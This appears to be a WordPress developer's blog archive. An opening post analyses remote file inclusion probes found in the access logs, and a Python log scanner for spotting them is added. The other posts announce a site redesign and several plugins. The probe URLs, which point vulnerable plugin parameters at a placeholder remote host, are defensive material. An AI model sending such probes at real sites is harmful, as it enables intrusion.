Anatomy Of An Attack

In an effort to remove all invalid links and redirections from my site I’ve been paying very close attention to my access logs. Courtesy of the list that Redirection maintains I’ve noticed that my site has been under a prolonged attack.

No, there’s no panic just yet, and so far this is not something I’m worried about. The attacks appear to be part of a general ‘find any weakness in any website’ method, rather than a specific and directed attack. Let me give some details of the URLs that are being accessed:

/plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=someURL

/wp-content/plugins/myflash/myflash-button.php?wpPATH=someURL

/wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=someURL

/wp-content/plugins/Enigma2.php?boarddir=someURL
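As an added example (not code from the original post), here is one way to pull this kind of probe out of an access log: flag any request whose query parameter decodes to an absolute URL, the pattern shared by the four requests listed above. The log lines, the example.invalid hosts and the ALLOWED_URL_PARAMS allowlist are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme (http://, https://, ftp://, ...)
REMOTE_VALUE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Assumption: parameters that legitimately carry URLs on this site
ALLOWED_URL_PARAMS = {"redirect_to"}

def url_valued_params(target):
    """Names of query parameters whose decoded value is an absolute URL."""
    names = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values
        decoded = unquote(value).strip()
        if name not in ALLOWED_URL_PARAMS and REMOTE_VALUE_RE.match(decoded):
            names.append(name)
    return names

def scan(lines):
    """Return (client_ip, path, parameter) for every flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = match.group(1)
        client_ip = line.split(" ", 1)[0]
        for name in url_valued_params(target):
            findings.append((client_ip, urlsplit(target).path, name))
    return findings

# Constructed sample log lines (documentation IP ranges, example.invalid hosts)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://example.invalid/x.txt HTTP/1.1" 404 512',
    '192.0.2.10 - - [01/Jan/2008:10:00:02 +0000] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 404 512',
    '198.51.100.7 - - [01/Jan/2008:10:01:00 +0000] "GET /wp-login.php?redirect_to=https://example.invalid/wp-admin/ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2008:10:02:00 +0000] "GET /?s=guangzhou+theme HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Grouping the findings by client address or by parameter name shows whether the probes come from one scanner working through a list of known plugin paths.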

Site redesign and new plugin

A new design! I decided I needed a new and fresh look and the result is the still-in-progress ‘Guangzhou’ theme. My hope is that it’s both easier to navigate, as well as being lighter and more suitable for future work. Comments, as always, are welcomed.

In conjunction with the new theme I’ve made use of WP-Cache and Gravatar cache, which should result in a noticeable speed improvement. The site itself has undergone a good clean, with all invalid code being replaced, all dead links now corrected, and the addition of new sections for software, articles, and about myself.

On top of that I’ve added a new plugin: HTML Purified. This plugin changes the default comment filter and replaces it with HTML Purifier, a very exhaustive library that checks, validates, and corrects HTML. Not that WordPress is insecure by default, but this just beefs it up a notch, and ensures that comments are both safe and XHTML valid.

HeadSpace2 3.0.8: RSS options & update notification

Version 3.0.8 of HeadSpace2 brings with it:

  • RSS options – Change the RSS title and description for your site and category pages
  • Update notification – The HeadSpace2 plugin page will now show any updates to the plugin when they are released
  • Hack to allow HeadSpace2 to work with ImageManager plugin
  • Bug fix to remove error message when saving options

Filled In & HeadSpace – WordPress Plugins

An update on two of my WordPress plugins: HeadSpace is now standing at version 3, and Filled In at version 1.6. Both have had extensive changes. HeadSpace now allows you to define meta data across all WordPress pages, as well as supporting Ecto. Filled In is a very powerful form management system that has had a major revamp and is now much more capable and even has the ability to add CAPTCHA images to forms.

Spring Cleaning

An attempt to give my website a bit of spring cleaning has resulted in several new WordPress plugins.

The first is Tidy Up, which adds the ability to run HTML Tidy through all your posts and comments and produce a report on the quality of your HTML. If you’re feeling brave you can also have the plugin automatically fix any problems.

Next is Search Regex. As the name would suggest, this is a search and replace plugin. It allows you to search and replace phrases inside posts, pages, comments, and meta-data. In addition to plain text searches, you can also use full PHP regular expressions. This makes it very easy to bulk-modify a WordPress installation, should you decide to move directories. Several other similar plugins exist, but I couldn’t find one that provided the regular expression capability that I needed.

Anti-spam and HeadSpace 2 plugins

There’s a revamp of an old plugin over at HeadSpace 2, and a new (not foolproof) Anti-Email Spam plugin.

HeadSpace 2 cleans up my oldest plugin, and gives it a nice administrative interface along with several nice new features. The Anti-Email spam plugin was some code that I developed for a client that I thought might make a handy plugin for some people. It replaces any email addresses in a post with an encoded version that should fool spam harvesting software.